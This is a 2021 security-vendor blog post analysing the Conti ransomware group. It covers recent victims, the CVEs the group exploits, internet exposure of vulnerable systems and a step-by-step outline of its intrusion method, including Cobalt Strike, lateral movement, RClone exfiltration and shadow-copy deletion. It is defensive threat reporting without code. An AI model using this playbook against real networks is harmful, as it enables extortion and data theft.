Is Conti Ransomware on a roll?
Posted on 7th Jul, 2021 | By Priya Ravindran
The Conti group is associated with three vulnerabilities. If these had taken precedence in the CVE patching priority, the series of Conti attacks could have been avoided.
CVE-2020-0796 and CVE-2018-13379 were warned against in CSW’s Ransomware Reports published in February and May 2021.
Let us take a look at the different recent incidents in which the Conti group has been involved.
The Ireland HSE incident shook the health industry, closely following in the wake of the Oil industry’s Colonial Pipeline attack; IT systems had to be shut down, leading to chaos in rendering regular health services. Exagrid paid a $2.6M ransom in the form of 50.75 Bitcoins for a decryption tool and to prevent data from being leaked. In more recent updates in the last week of June 2021, Conti claimed responsibility for an attack on the city of Tulsa in early May, leaking over 18,000 city files on the Dark Web. Three Canadian companies - an Internet provider and an engineering firm, both from Ontario, and a Quebec-based insurance broker - have also fallen victim to the group, according to Conti's website.
Conti - A Cheat Sheet
We analyzed three CVEs being exploited by the Conti group - CVE-2020-0796,
It is widely believed that Russia’s Wizard Spider Advanced Persistent Threat (APT) group uses the Conti ransomware in its attacks.
A Shodan analysis of CVE-2020-0796 brings up over 75,000 deployments, mainly focused in Taiwan and Japan. Windows 10 Home is the most widely used OS susceptible to CVE-2020-0796 exploits.
There are over 60,000 deployments of FortiOS worldwide, according to Shodan, with the US ranking first on the list.
Looking at multiple attacks involving Conti ransomware, we have understood the following to be their overall attack methodology.
Scout for weak entry points in devices and infect them with IcedID payload, followed by BazarLoader malware.
Use batch files to disable security tools through the created backdoor.
Deploy Cobalt Strike beacon to gather confidential details
Scan to identify open ports
Utilize a combination of Remote Desktop Protocol (RDP), PsExec and Server Message Block (SMB) to worm its way laterally within the network
Exfiltrate data to cloud storage through command line tools like RClone
Stealthily deploy Cobalt Strike beacon to attached devices
Execute malicious code in memory across all active systems
Delete shadow copy using Windows Management Instrumentation (WMI)
Ransomware continues ploughing through until detected
Coincidentally, on June 1, 2021, the FBI sent out a warning regarding New Zealand based Mega cloud storage being used by ransomware groups like Conti, for data storage.
MITRE ATT&CK Mapping
|Indicators of Compromise|
A thorough ransomware analysis is the need of the hour
The vulnerabilities CVE-2020-0796 and CVE-2018-13379 are currently trending, although they were discovered more than a year back. This is a clear indication of the importance of patching older vulnerabilities and not just the newly discovered high-severity ones. In fact, as highlighted in CSW’s Ransomware Report, vulnerabilities that were discovered in 2020 and earlier accounted for 97% of the total vulnerability count (260) as of March 2021.
The recent series of attacks is an example of how attackers might be taking it slow, waiting for bigger opportunities leading to crippling disruption. Adopting a risk-based approach and prioritizing critical vulnerabilities based on threat context is the need of the hour.